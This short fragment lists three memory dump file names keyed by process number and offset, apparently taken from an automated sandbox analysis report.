memory/2032-77-0x0000000000000000-mapping.dmp
-
memory/2040-70-0x0000000000000000-mapping.dmp
-
memory/2040-120-0x0000000000000000-mapping.dmp